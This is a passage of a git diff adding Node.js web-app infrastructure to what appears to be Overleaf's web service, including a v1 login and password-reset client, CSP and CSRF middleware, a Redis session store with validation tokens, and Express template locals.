(response?.statusCode === 403) { + error = new Errors.ForbiddenError('overleaf v1 returned forbidden') + error.statusCode = response.statusCode + return callback(error) + } else if (response?.statusCode === 404) { + error = new Errors.NotFoundError( + `overleaf v1 returned non-success code: ${response.statusCode} ${options.method} ${options.uri}` + ) + error.statusCode = response.statusCode + return callback(error) + } else { + error = new Error( + `overleaf v1 returned non-success code: ${response?.statusCode} ${options.method} ${options.uri}` + ) + error.statusCode = response?.statusCode + return callback(error) + } + }, +} + +V1Api.promises = promisifyAll(V1Api, { + multiResult: { + request: ['response', 'body'], + oauthRequest: ['response', 'body'], + }, +}) +module.exports = V1Api diff --git a/services/web/app/src/Features/V1/V1Handler.mjs b/services/web/app/src/Features/V1/V1Handler.mjs new file mode 100644 index 0000000..7c5f2d3 --- /dev/null +++ b/services/web/app/src/Features/V1/V1Handler.mjs @@ -0,0 +1,90 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
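+//
+// Usage sketch (illustrative): authWithV1 reports whether v1 accepted the
+// credentials, plus the v1 user profile:
+//
+//   V1Handler.authWithV1(email, password, (err, isValid, userProfile) => {
+//     // isValid mirrors `body.valid` from the v1 login API; both 200 and
+//     // 403 responses are parsed rather than treated as errors
+//   })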
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import OError from '@overleaf/o-error' +import V1Api from './V1Api.js' +import logger from '@overleaf/logger' + +let V1Handler + +export default V1Handler = { + authWithV1(email, password, callback) { + return V1Api.request( + { + method: 'POST', + url: '/api/v1/overleaf/login', + json: { email, password }, + expectedStatusCodes: [403], + }, + function (err, response, body) { + if (err != null) { + OError.tag(err, '[V1Handler] error while talking to v1 login api', { + email, + }) + return callback(err) + } + if ([200, 403].includes(response.statusCode)) { + const isValid = body.valid + const userProfile = body.user_profile + logger.debug( + { + email, + isValid, + v1UserId: body?.user_profile?.id, + }, + '[V1Handler] got response from v1 login api' + ) + return callback(null, isValid, userProfile) + } else { + err = new Error( + `Unexpected status from v1 login api: ${response.statusCode}` + ) + return callback(err) + } + } + ) + }, + + doPasswordReset(v1UserId, password, callback) { + return V1Api.request( + { + method: 'POST', + url: '/api/v1/overleaf/reset_password', + json: { + user_id: v1UserId, + password, + }, + expectedStatusCodes: [200], + }, + function (err, response, body) { + if (err != null) { + OError.tag(err, 'error while talking to v1 password reset api', { + v1_user_id: v1UserId, + }) + return callback(err, false) + } + if ([200].includes(response.statusCode)) { + logger.debug( + { v1UserId, changed: true }, + 'got success response from v1 password reset api' + ) + return callback(null, true) + } else { + err = new Error( + `Unexpected status from v1 password reset api: ${response.statusCode}` + ) + return callback(err, false) + } + } + ) + }, +} diff --git a/services/web/app/src/infrastructure/BodyParserWrapper.js b/services/web/app/src/infrastructure/BodyParserWrapper.js new file mode 100644 index 0000000..544a7f2 --- /dev/null +++ b/services/web/app/src/infrastructure/BodyParserWrapper.js @@ -0,0 +1,35 @@ +const bodyParser = require('body-parser') +const HttpErrorHandler = require('../Features/Errors/HttpErrorHandler') + +function isBodyParserError(nextArg) { + if (nextArg instanceof Error) { + return ( + nextArg.statusCode && + nextArg.statusCode >= 400 && + nextArg.statusCode < 600 + ) + } + return false +} + +const wrapBodyParser = method => opts => { + const middleware = bodyParser[method](opts) + return function bodyParser(req, res, next) { + middleware(req, res, nextArg => { + if (isBodyParserError(nextArg)) { + return HttpErrorHandler.handleErrorByStatusCode( + req, + res, + nextArg, + nextArg.statusCode + ) + } + next(nextArg) + }) + } +} + +module.exports = { + urlencoded: wrapBodyParser('urlencoded'), + json: wrapBodyParser('json'), +} diff --git a/services/web/app/src/infrastructure/CSP.js b/services/web/app/src/infrastructure/CSP.js new file mode 100644 index 0000000..423154d --- /dev/null +++ b/services/web/app/src/infrastructure/CSP.js @@ -0,0 +1,134 @@ +const crypto = require('crypto') +const path = require('path') + +module.exports = function ({ + reportUri, + reportPercentage, + reportOnly = false, + exclude = [], + viewDirectives = {}, +}) { + const header = reportOnly + ? 
'Content-Security-Policy-Report-Only' + : 'Content-Security-Policy' + + const defaultPolicy = buildDefaultPolicy(reportUri) + + return function (req, res, next) { + // set the default policy + res.set(header, defaultPolicy) + if (reportUri) { + res.set('Reporting-Endpoints', `csp-endpoint="${reportUri}"`) + } + + const originalRender = res.render + + res.render = (...args) => { + const view = relativeViewPath(args[0]) + + if (exclude.includes(view)) { + // remove the default policy + res.removeHeader(header) + res.removeHeader('Reporting-Endpoints') + } else { + // set the view policy + res.locals.cspEnabled = true + + const scriptNonce = crypto.randomBytes(16).toString('base64') + + res.locals.scriptNonce = scriptNonce + + const policy = buildViewPolicy( + scriptNonce, + reportPercentage, + reportUri, + viewDirectives[view] + ) + + // Note: https://csp-evaluator.withgoogle.com/ is useful for checking the policy + + res.set(header, policy) + } + + originalRender.apply(res, args) + } + + next() + } +} + +const buildDefaultPolicy = (reportUri, styleSrc) => { + const directives = [ + `base-uri 'none'`, // forbid setting a "base" element + `default-src 'none'`, // forbid loading anything from a "src" attribute + `form-action 'none'`, // forbid setting a form action + `frame-ancestors 'none'`, // forbid loading embedded content + `img-src 'self'`, // allow loading images from the same domain (e.g. the favicon). + ] + + if (reportUri) { + directives.push(`report-uri ${reportUri}`) + directives.push(`report-to csp-endpoint`) + } + + if (styleSrc) { + directives.push(`style-src ${styleSrc}`) + } + + return directives.join('; ') +} + +const buildViewPolicy = ( + scriptNonce, + reportPercentage, + reportUri, + viewDirectives +) => { + const directives = [ + `script-src 'nonce-${scriptNonce}' 'unsafe-inline' 'strict-dynamic' https: 'report-sample'`, // only allow scripts from certain sources + `object-src 'none'`, // forbid loading an "object" element + `base-uri 'none'`, // forbid setting a "base" element + ...(viewDirectives ?? []), + ] + + if (reportUri) { + // enable the report URI for a percentage of CSP-enabled requests + const belowReportCutoff = Math.random() * 100 <= reportPercentage + + if (belowReportCutoff) { + directives.push(`report-uri ${reportUri}`) + directives.push(`report-to csp-endpoint`) + } + } + + return directives.join('; ') +} + +const webRoot = path.resolve(__dirname, '..', '..', '..') + +// build the view path relative to the web root +function relativeViewPath(view) { + return path.isAbsolute(view) + ? path.relative(webRoot, view) + : path.join('app', 'views', view) +} + +function removeCSPHeaders(res) { + res.removeHeader('Content-Security-Policy') + res.removeHeader('Content-Security-Policy-Report-Only') +} + +/** + * WARNING: allowing inline styles can open a security hole; + * this is intended only for use in specific circumstances, such as Safari's built-in PDF viewer. 
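+ *
+ * For reference, the call below keeps the locked-down default policy and only
+ * swaps in the inline-style allowance, producing:
+ *
+ *   Content-Security-Policy: base-uri 'none'; default-src 'none'; form-action 'none'; frame-ancestors 'none'; img-src 'self'; style-src 'unsafe-inline'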
+ */
+function allowUnsafeInlineStyles(res) {
+  res.set(
+    'Content-Security-Policy',
+    buildDefaultPolicy(undefined, "'unsafe-inline'")
+  )
+}
+
+module.exports.buildDefaultPolicy = buildDefaultPolicy
+module.exports.removeCSPHeaders = removeCSPHeaders
+module.exports.allowUnsafeInlineStyles = allowUnsafeInlineStyles
diff --git a/services/web/app/src/infrastructure/CookieMetrics.js b/services/web/app/src/infrastructure/CookieMetrics.js
new file mode 100644
index 0000000..9e35b51
--- /dev/null
+++ b/services/web/app/src/infrastructure/CookieMetrics.js
@@ -0,0 +1,30 @@
+const Settings = require('@overleaf/settings')
+const metrics = require('@overleaf/metrics')
+
+/**
+ * Middleware function to record session cookie metrics. This allows us to
+ * detect whether users are sending valid signed cookies, cookies with invalid
+ * signatures (e.g. using an old key), or no cookies at all.
+ *
+ * Signed cookies begin with the prefix 's:'. If the signature fails to verify,
+ * the signed cookie value is returned as false.
+ */
+function middleware(req, res, next) {
+  const cookieName = Settings.cookieName
+  const cookie = req.cookies && req.cookies[cookieName]
+  const signedCookie = req.signedCookies && req.signedCookies[cookieName]
+  let status
+  if (signedCookie) {
+    status = 'signed'
+  } else if (signedCookie === false) {
+    status = 'bad-signature'
+  } else if (cookie) {
+    status = 'unsigned'
+  } else {
+    status = 'none'
+  }
+  metrics.inc('session.cookie', 1, { status })
+  next()
+}
+
+module.exports = { middleware }
diff --git a/services/web/app/src/infrastructure/Csrf.js b/services/web/app/src/infrastructure/Csrf.js
new file mode 100644
index 0000000..71fb3ac
--- /dev/null
+++ b/services/web/app/src/infrastructure/Csrf.js
@@ -0,0 +1,114 @@
+/* eslint-disable
+    max-len,
+    no-return-assign,
+    no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+
+const csurf = require('csurf')
+const csrf = csurf()
+const { promisify } = require('util')
+const Settings = require('@overleaf/settings')
+const logger = require('@overleaf/logger')
+
+// Wrapper for `csurf` middleware that provides a list of routes that can be excluded from csrf checks.
+//
+// Include with `Csrf = require('./Csrf')`
+//
+// Add the middleware to the router with:
+//   myRouter.csrf = new Csrf()
+//   myRouter.use(myRouter.csrf.middleware)
+// When building routes, specify a route to exclude from csrf checks with:
+//   myRouter.csrf.disableDefaultCsrfProtection('/path', 'METHOD')
+//
+// To validate the csrf token in a request to ensure that it's valid, you can use `validateRequest`, which takes a
+// request object and calls a callback with an error if invalid.
+
+class Csrf {
+  constructor() {
+    this.middleware = this.middleware.bind(this)
+    this.excluded_routes = {}
+  }
+
+  static blockCrossOriginRequests() {
+    return function (req, res, next) {
+      const { origin } = req.headers
+      // NOTE: Only cross-origin requests must have an origin header set.
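+      // Same-origin requests and non-browser clients may not send the header
+      // at all, so only requests that do send an Origin from outside the
+      // allow-list are rejected here.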
+ if (origin && !Settings.allowedOrigins.includes(origin)) { + logger.warn({ req }, 'blocking cross-origin request') + return res.sendStatus(403) + } + next() + } + } + + disableDefaultCsrfProtection(route, method) { + if (!this.excluded_routes[route]) { + this.excluded_routes[route] = {} + } + return (this.excluded_routes[route][method] = 1) + } + + middleware(req, res, next) { + // We want to call the middleware for all routes, even if excluded, because csurf sets up a csrfToken() method on + // the request, to get a new csrf token for any rendered forms. For excluded routes we'll then ignore a 'bad csrf + // token' error from csurf and continue on... + + // check whether the request method is excluded for the specified route + if ( + (this.excluded_routes[req.path] != null + ? this.excluded_routes[req.path][req.method] + : undefined) === 1 + ) { + // ignore the error if it's due to a bad csrf token, and continue + return csrf(req, res, err => { + if (err && err.code !== 'EBADCSRFTOKEN') { + return next(err) + } else { + return next() + } + }) + } else { + return csrf(req, res, next) + } + } + + static validateRequest(req, cb) { + // run a dummy csrf check to see if it returns an error + if (cb == null) { + cb = function (valid) {} + } + return csrf(req, null, err => cb(err)) + } + + static validateToken(token, session, cb) { + if (token == null) { + return cb(new Error('missing token')) + } + // run a dummy csrf check to see if it returns an error + // use this to simulate a csrf check regardless of req method, headers &c. + const req = { + body: { + _csrf: token, + }, + headers: {}, + method: 'POST', + session, + } + return Csrf.validateRequest(req, cb) + } +} + +Csrf.promises = { + validateRequest: promisify(Csrf.validateRequest), + validateToken: promisify(Csrf.validateToken), +} + +module.exports = Csrf diff --git a/services/web/app/src/infrastructure/CustomSessionStore.js b/services/web/app/src/infrastructure/CustomSessionStore.js new file mode 100644 index 0000000..5c81105 --- /dev/null +++ b/services/web/app/src/infrastructure/CustomSessionStore.js @@ -0,0 +1,165 @@ +const session = require('express-session') +const RedisStore = require('connect-redis')(session) +const metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const SessionManager = require('../Features/Authentication/SessionManager') +const Metrics = require('@overleaf/metrics') + +const MAX_SESSION_SIZE_THRESHOLD = 4096 + +// Define a custom session store to record session metrics and log large +// anonymous sessions for debugging purposes +// Also make the SET calls more robust/consistent by adding flags +// - XX: ensure update in place, expect that the old session value is still in redis at that key +// - NX: ensure initial set, expect that there is no other session at that key already +class CustomSessionStore extends RedisStore { + static largestSessionSize = 3 * 1024 // ignore sessions smaller than 3KB + #initialSetStore + #updateInPlaceStore + + constructor({ client }) { + super({ client }) + this.#initialSetStore = new RedisStore({ + client: new CustomSetRedisClient(client, 'NX'), + }) + this.#updateInPlaceStore = new RedisStore({ + client: new CustomSetRedisClient(client, 'XX'), + }) + } + + static metric(method, sess) { + let type // type of session: 'logged-in', 'anonymous', or 'na' (not available) + if (sess) { + type = SessionManager.isUserLoggedIn(sess) ? 
'logged-in' : 'anonymous'
+    } else {
+      type = 'na'
+    }
+    const size = sess ? JSON.stringify(sess).length : 0
+    // record the number of redis session operations
+    metrics.inc('session.store.count', 1, {
+      method,
+      type,
+      status: size > MAX_SESSION_SIZE_THRESHOLD ? 'oversize' : 'normal',
+    })
+    // record the redis session bandwidth for get/set operations
+    if (method === 'get' || method === 'set') {
+      metrics.count('session.store.bytes', size, { method, type })
+    }
+    // log the largest anonymous session seen so far
+    if (type === 'anonymous' && size > CustomSessionStore.largestSessionSize) {
+      CustomSessionStore.largestSessionSize = size
+      logger.warn(
+        { redactedSession: redactSession(sess), largestSessionSize: size },
+        'largest session size seen'
+      )
+    }
+  }
+
+  get(sid, cb) {
+    super.get(sid, (err, sess) => {
+      if (err || !sess || !checkValidationToken(sid, sess)) return cb(err, null)
+      CustomSessionStore.metric('get', sess)
+      cb(null, sess)
+    })
+  }
+
+  set(sid, sess, cb) {
+    // Refresh the validation token just before writing to Redis
+    // This ensures that the token always matches the sessionID that we write the session value for.
+    // Potential reasons for missing/mismatching token:
+    // - brand-new session
+    // - cycling of the sessionID as part of the login flow
+    // - upgrade from a client side session to a redis session
+    // - accidental writes in the app code
+    sess.validationToken = computeValidationToken(sid)
+
+    CustomSessionStore.metric('set', sess)
+    const originalId = sess.req.signedCookies[Settings.cookieName]
+    if (sid === originalId || sid === sess.req.newSessionId) {
+      this.#updateInPlaceStore.set(sid, sess, cb)
+    } else {
+      Metrics.inc('security.session', 1, { status: 'new' })
+      // Multiple writes can get issued with the new sid. Keep track of it.
+      Object.defineProperty(sess.req, 'newSessionId', { value: sid })
+      this.#initialSetStore.set(sid, sess, cb)
+    }
+  }
+
+  touch(sid, sess, cb) {
+    CustomSessionStore.metric('touch', sess)
+    super.touch(sid, sess, cb)
+  }
+
+  destroy(sid, cb) {
+    // for the destroy method we don't have access to the session object itself
+    CustomSessionStore.metric('destroy')
+    super.destroy(sid, cb)
+  }
+}
+
+function computeValidationToken(sid) {
+  // This should be a deterministic function of the client-side sessionID,
+  // prepended with a version number in case we want to change it later.
+  return 'v1:' + sid.slice(-4)
+}
+
+function checkValidationToken(sid, sess) {
+  const sessionToken = sess.validationToken
+  if (sessionToken) {
+    const clientToken = computeValidationToken(sid)
+    // Reject sessions where the validation token is out of sync with the sessionID.
+    // If you change the method for computing the token (above) then you need to either check or ignore previous versions of the token.
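+    // Worked example (sid value illustrative): for a sessionID ending in
+    // 'abcd' the stored token must be 'v1:abcd'; a session value copied to a
+    // different sessionID carries a stale token and is rejected below.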
+ if (sessionToken === clientToken) { + Metrics.inc('security.session', 1, { status: 'ok' }) + return true + } else { + logger.warn( + { sid, sessionToken, clientToken }, + 'session token validation failed' + ) + Metrics.inc('security.session', 1, { status: 'error' }) + return false + } + } else { + Metrics.inc('security.session', 1, { status: 'missing' }) + return false + } +} + +// Helper function to return a redacted version of session object +// so we can identify the largest keys without exposing sensitive +// data +function redactSession(sess) { + // replace all string values with '***' of the same length + return JSON.parse( + JSON.stringify(sess, (key, value) => { + if (typeof value === 'string') { + return '*'.repeat(value.length) + } + return value + }) + ) +} + +class CustomSetRedisClient { + #client + #flag + constructor(client, flag) { + this.#client = client + this.#flag = flag + } + + set(args, cb) { + args.push(this.#flag) + this.#client.set(args, (err, ok) => { + metrics.inc('session.store.set', 1, { + path: this.#flag, + status: err ? 'error' : ok ? 'success' : 'failure', + }) + cb(err, ok) + }) + } +} + +module.exports = CustomSessionStore diff --git a/services/web/app/src/infrastructure/ExpressLocals.js b/services/web/app/src/infrastructure/ExpressLocals.js new file mode 100644 index 0000000..eae1b48 --- /dev/null +++ b/services/web/app/src/infrastructure/ExpressLocals.js @@ -0,0 +1,437 @@ +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const _ = require('lodash') +const { URL } = require('url') +const Path = require('path') +const moment = require('moment') +const { fetchJson } = require('@overleaf/fetch-utils') +const contentDisposition = require('content-disposition') +const Features = require('./Features') +const SessionManager = require('../Features/Authentication/SessionManager') +const PackageVersions = require('./PackageVersions') +const Modules = require('./Modules') +const Errors = require('../Features/Errors/Errors') +const { + canRedirectToAdminDomain, + hasAdminAccess, +} = require('../Features/Helpers/AdminAuthorizationHelper') +const { + addOptionalCleanupHandlerAfterDrainingConnections, +} = require('./GracefulShutdown') + +const IEEE_BRAND_ID = Settings.ieeeBrandId + +let webpackManifest +function loadManifest() { + switch (process.env.NODE_ENV) { + case 'production': + // Only load webpack manifest file in production. + webpackManifest = require('../../../public/manifest.json') + break + case 'development': { + // In dev, fetch the manifest from the webpack container. + loadManifestFromWebpackDevServer() + const intervalHandle = setInterval( + loadManifestFromWebpackDevServer, + 10 * 1000 + ) + addOptionalCleanupHandlerAfterDrainingConnections( + 'refresh webpack manifest', + () => { + clearInterval(intervalHandle) + } + ) + break + } + default: + // In ci, all entries are undefined. + webpackManifest = {} + } +} +function loadManifestFromWebpackDevServer(done = function () {}) { + fetchJson(new URL(`/manifest.json`, Settings.apis.webpack.url), { + headers: { + Host: 'localhost', + }, + }) + .then(json => { + webpackManifest = json + done() + }) + .catch(error => { + logger.err({ error }, 'cannot fetch webpack manifest') + done(error) + }) +} +const IN_CI = process.env.NODE_ENV === 'test' +function getWebpackAssets(entrypoint, section) { + if (IN_CI) { + // Emit an empty list of entries in CI. 
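+    // (IN_CI is true when NODE_ENV is 'test'; loadManifest leaves the
+    // manifest empty there, so there are no entries to look up)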
+    return []
+  }
+  return webpackManifest.entrypoints[entrypoint].assets[section] || []
+}
+
+module.exports = function (webRouter, privateApiRouter, publicApiRouter) {
+  loadManifest()
+  if (process.env.NODE_ENV === 'development') {
+    // In the dev-env, delay requests until we fetched the manifest once.
+    webRouter.use(function (req, res, next) {
+      if (!webpackManifest) {
+        loadManifestFromWebpackDevServer(next)
+      } else {
+        next()
+      }
+    })
+  }
+
+  webRouter.use(function (req, res, next) {
+    res.locals.session = req.session
+    next()
+  })
+
+  function addSetContentDisposition(req, res, next) {
+    res.setContentDisposition = function (type, { filename }) {
+      res.setHeader(
+        'Content-Disposition',
+        contentDisposition(filename, { type })
+      )
+    }
+    next()
+  }
+  webRouter.use(addSetContentDisposition)
+  privateApiRouter.use(addSetContentDisposition)
+  publicApiRouter.use(addSetContentDisposition)
+
+  webRouter.use(function (req, res, next) {
+    req.externalAuthenticationSystemUsed =
+      Features.externalAuthenticationSystemUsed
+    res.locals.externalAuthenticationSystemUsed =
+      Features.externalAuthenticationSystemUsed
+    req.hasFeature = res.locals.hasFeature = Features.hasFeature
+    next()
+  })
+
+  webRouter.use(function (req, res, next) {
+    let staticFilesBase
+
+    const cdnAvailable =
+      Settings.cdn && Settings.cdn.web && !!Settings.cdn.web.host
+    const cdnBlocked =
+      req.query.nocdn === 'true' || req.session.cdnBlocked || false
+    const userId = SessionManager.getLoggedInUserId(req.session)
+    if (cdnBlocked && req.session.cdnBlocked == null) {
+      logger.debug(
+        { userId, ip: req != null ? req.ip : undefined },
+        'cdnBlocked for user, not using it and turning it off for future requests'
+      )
+      Metrics.inc('no_cdn', 1, {
+        path: userId ? 'logged-in' : 'pre-login',
+        method: 'true',
+      })
+      req.session.cdnBlocked = true
+    }
+    Metrics.inc('cdn_blocked', 1, {
+      path: userId ? 'logged-in' : 'pre-login',
+      method: String(cdnBlocked),
+    })
+    const host = req.headers && req.headers.host
+    const isSmoke = host.slice(0, 5).toLowerCase() === 'smoke'
+    if (cdnAvailable && !isSmoke && !cdnBlocked) {
+      staticFilesBase = Settings.cdn.web.host
+    } else {
+      staticFilesBase = ''
+    }
+
+    res.locals.buildBaseAssetPath = function () {
+      // Return the base asset path (including the CDN url) so that webpack can
+      // use this to dynamically fetch scripts (e.g. PDFjs worker)
+      return staticFilesBase + '/'
+    }
+
+    res.locals.buildJsPath = function (jsFile) {
+      return staticFilesBase + webpackManifest[jsFile]
+    }
+
+    res.locals.buildCopiedJsAssetPath = function (jsFile) {
+      return staticFilesBase + (webpackManifest[jsFile] || '/' + jsFile)
+    }
+
+    let runtimeEmitted = false
+    const runtimeChunk = webpackManifest['runtime.js']
+    res.locals.entrypointScripts = function (entrypoint) {
+      // Each "entrypoint" contains the runtime chunk as imports.
+      // Loading the entrypoint twice results in broken execution.
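+      // Example (entrypoint names illustrative): if a page renders two
+      // entrypoints, only the first call keeps the runtime chunk:
+      //   entrypointScripts('marketing') // includes runtime.js
+      //   entrypointScripts('editor')    // runtime.js filtered out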
+ let chunks = getWebpackAssets(entrypoint, 'js') + if (runtimeEmitted) { + chunks = chunks.filter(chunk => chunk !== runtimeChunk) + } + runtimeEmitted = true + return chunks.map(chunk => staticFilesBase + chunk) + } + + res.locals.entrypointStyles = function (entrypoint) { + const chunks = getWebpackAssets(entrypoint, 'css') + return chunks.map(chunk => staticFilesBase + chunk) + } + + res.locals.mathJaxPath = `/js/libs/mathjax-${PackageVersions.version.mathjax}/es5/tex-svg-full.js` + res.locals.dictionariesRoot = `/js/dictionaries/${PackageVersions.version.dictionaries}/` + + res.locals.lib = PackageVersions.lib + + res.locals.moment = moment + + res.locals.isIEEE = brandId => brandId === IEEE_BRAND_ID + + res.locals.getCssThemeModifier = function ( + userSettings, + brandVariation, + enableIeeeBranding + ) { + // Themes only exist in OL v2 + if (Settings.overleaf != null) { + // The IEEE theme is no longer applied in the editor, which sets + // enableIeeeBranding to false, but is used in the IEEE portal. If + // this is an IEEE-branded page and IEEE branding is disabled in this + // page, always use the default theme (i.e. no light theme in the + // IEEE-branded editor) + if (res.locals.isIEEE(brandVariation?.brand_id)) { + return enableIeeeBranding ? 'ieee-' : '' + } else if (userSettings && userSettings.overallTheme != null) { + return userSettings.overallTheme + } + } + return '' + } + + res.locals.buildStylesheetPath = function (cssFileName) { + return staticFilesBase + webpackManifest[cssFileName] + } + + res.locals.buildCssPath = function ( + themeModifier = '', + bootstrapVersion = 3 + ) { + // Pick which main stylesheet to use based on Bootstrap version + return res.locals.buildStylesheetPath( + bootstrapVersion === 5 + ? 'main-style-bootstrap-5.css' + : `main-${themeModifier}style.css` + ) + } + + res.locals.buildImgPath = function (imgFile) { + const path = Path.join('/img/', imgFile) + return staticFilesBase + path + } + + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.translate = req.i18n.translate + + const addTranslatedTextDeep = obj => { + if (_.isObject(obj)) { + if (_.has(obj, 'text')) { + obj.translatedText = req.i18n.translate(obj.text) + } + _.forOwn(obj, value => { + addTranslatedTextDeep(value) + }) + } + } + + // This function is used to add translations from the server for main + // navigation and footer items because it's tricky to get them in the front + // end otherwise. + res.locals.cloneAndTranslateText = obj => { + const clone = _.cloneDeep(obj) + addTranslatedTextDeep(clone) + return clone + } + + // Don't include the query string parameters, otherwise Google + // treats ?nocdn=true as the canonical version + try { + const parsedOriginalUrl = new URL(req.originalUrl, Settings.siteUrl) + res.locals.currentUrl = parsedOriginalUrl.pathname + res.locals.currentUrlWithQueryParams = + parsedOriginalUrl.pathname + parsedOriginalUrl.search + } catch (err) { + return next(new Errors.InvalidError()) + } + res.locals.capitalize = function (string) { + if (string.length === 0) { + return '' + } + return string.charAt(0).toUpperCase() + string.slice(1) + } + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.getUserEmail = function () { + const user = SessionManager.getSessionUser(req.session) + const email = (user != null ? 
user.email : undefined) || '' + return email + } + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.StringHelper = require('../Features/Helpers/StringHelper') + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.csrfToken = req != null ? req.csrfToken() : undefined + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.getReqQueryParam = field => + req.query != null ? req.query[field] : undefined + next() + }) + + webRouter.use(function (req, res, next) { + const currentUser = SessionManager.getSessionUser(req.session) + if (currentUser != null) { + res.locals.user = { + email: currentUser.email, + first_name: currentUser.first_name, + last_name: currentUser.last_name, + } + } + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.getLoggedInUserId = () => + SessionManager.getLoggedInUserId(req.session) + res.locals.getSessionUser = () => SessionManager.getSessionUser(req.session) + res.locals.canRedirectToAdminDomain = () => + canRedirectToAdminDomain(SessionManager.getSessionUser(req.session)) + res.locals.hasAdminAccess = () => + hasAdminAccess(SessionManager.getSessionUser(req.session)) + next() + }) + + webRouter.use(function (req, res, next) { + // Clone the nav settings so they can be modified for each request + res.locals.nav = {} + for (const key in Settings.nav) { + res.locals.nav[key] = _.clone(Settings.nav[key]) + } + res.locals.templates = Settings.templateLinks + next() + }) + + webRouter.use(function (req, res, next) { + if (Settings.reloadModuleViewsOnEachRequest) { + Modules.loadViewIncludes(req.app) + } + res.locals.moduleIncludes = Modules.moduleIncludes + res.locals.moduleIncludesAvailable = Modules.moduleIncludesAvailable + next() + }) + + webRouter.use(function (req, res, next) { + // TODO + if (Settings.overleaf != null) { + res.locals.overallThemes = [ + { + name: 'Default', + val: '', + path: res.locals.buildCssPath(), + }, + { + name: 'Light', + val: 'light-', + path: res.locals.buildCssPath('light-'), + }, + ] + } + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.settings = Settings + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.showThinFooter = !Features.hasFeature('saas') + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.bootstrap5Override = + req.query['bootstrap-5-override'] === 'enabled' + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.websiteRedesignOverride = req.query.redesign === 'enabled' + next() + }) + + webRouter.use(function (req, res, next) { + res.locals.ExposedSettings = { + isOverleaf: Settings.overleaf != null, + appName: Settings.appName, + adminEmail: Settings.adminEmail, + dropboxAppName: + Settings.apis.thirdPartyDataStore?.dropboxAppName || 'Overleaf', + ieeeBrandId: IEEE_BRAND_ID, + hasSamlBeta: req.session.samlBeta, + hasAffiliationsFeature: Features.hasFeature('affiliations'), + hasSamlFeature: Features.hasFeature('saml'), + samlInitPath: _.get(Settings, ['saml', 'ukamf', 'initPath']), + hasLinkUrlFeature: Features.hasFeature('link-url'), + hasLinkedProjectFileFeature: Features.hasFeature('linked-project-file'), + hasLinkedProjectOutputFileFeature: Features.hasFeature( + 'linked-project-output-file' + ), + siteUrl: Settings.siteUrl, + emailConfirmationDisabled: Settings.emailConfirmationDisabled, + maxEntitiesPerProject: Settings.maxEntitiesPerProject, + maxUploadSize: Settings.maxUploadSize, + projectUploadTimeout: Settings.projectUploadTimeout, + recaptchaSiteKey: 
Settings.recaptcha?.siteKey,
+      recaptchaSiteKeyV3: Settings.recaptcha?.siteKeyV3,
+      recaptchaDisabled: Settings.recaptcha?.disabled,
+      textExtensions: Settings.textExtensions,
+      editableFilenames: Settings.editableFilenames,
+      validRootDocExtensions: Settings.validRootDocExtensions,
+      fileIgnorePattern: Settings.fileIgnorePattern,
+      sentryAllowedOriginRegex: Settings.sentry.allowedOriginRegex,
+      sentryDsn: Settings.sentry.publicDSN,
+      sentryEnvironment: Settings.sentry.environment,
+      sentryRelease: Settings.sentry.release,
+      hotjarId: Settings.hotjar?.id,
+      hotjarVersion: Settings.hotjar?.version,
+      enableSubscriptions: Settings.enableSubscriptions,
+      gaToken:
+        Settings.analytics &&
+        Settings.analytics.ga &&
+        Settings.analytics.ga.token,
+      gaTokenV4:
+        Settings.analytics &&
+        Settings.analytics.ga &&
+        Settings.analytics.ga.tokenV4,
+      cookieDomain: Settings.cookieDomain,
+      templateLinks: Settings.templateLinks,
+      labsEnabled: Settings.labs && Settings.labs.enable,
+      wikiEnabled: Settings.overleaf != null || Settings.proxyLearn,
+      templatesEnabled:
+        Settings.overleaf != null || Settings.templates?.user_id != null,
+      cioWriteKey: Settings.analytics?.cio?.writeKey,
+      cioSiteId: Settings.analytics?.cio?.siteId,
+    }
+    next()
+  })
+}
diff --git a/services/web/app/src/infrastructure/Features.js b/services/web/app/src/infrastructure/Features.js
new file mode 100644
index 0000000..aaf5110
--- /dev/null
+++ b/services/web/app/src/infrastructure/Features.js
@@ -0,0 +1,107 @@
+const _ = require('lodash')
+const Settings = require('@overleaf/settings')
+
+const supportModuleAvailable = Settings.moduleImportSequence.includes('support')
+
+const symbolPaletteModuleAvailable =
+  Settings.moduleImportSequence.includes('symbol-palette')
+
+const trackChangesModuleAvailable =
+  Settings.moduleImportSequence.includes('track-changes')
+
+/**
+ * @typedef {Object} Settings
+ * @property {Object | undefined} apis
+ * @property {Object | undefined} apis.linkedUrlProxy
+ * @property {string | undefined} apis.linkedUrlProxy.url
+ * @property {Object | undefined} apis.references
+ * @property {string | undefined} apis.references.url
+ * @property {boolean | undefined} enableGithubSync
+ * @property {boolean | undefined} enableGitBridge
+ * @property {boolean | undefined} enableHomepage
+ * @property {boolean | undefined} enableProjectHistoryBlobs
+ * @property {boolean | undefined} disableFilestore
+ * @property {boolean | undefined} enableSaml
+ * @property {boolean | undefined} ldap
+ * @property {boolean | undefined} oauth
+ * @property {Object | undefined} overleaf
+ * @property {Object | undefined} overleaf.oauth
+ * @property {boolean | undefined} saml
+ */
+
+const Features = {
+  /**
+   * @returns {boolean}
+   */
+  externalAuthenticationSystemUsed() {
+    return (
+      (Boolean(Settings.ldap) && Boolean(Settings.ldap.enable)) ||
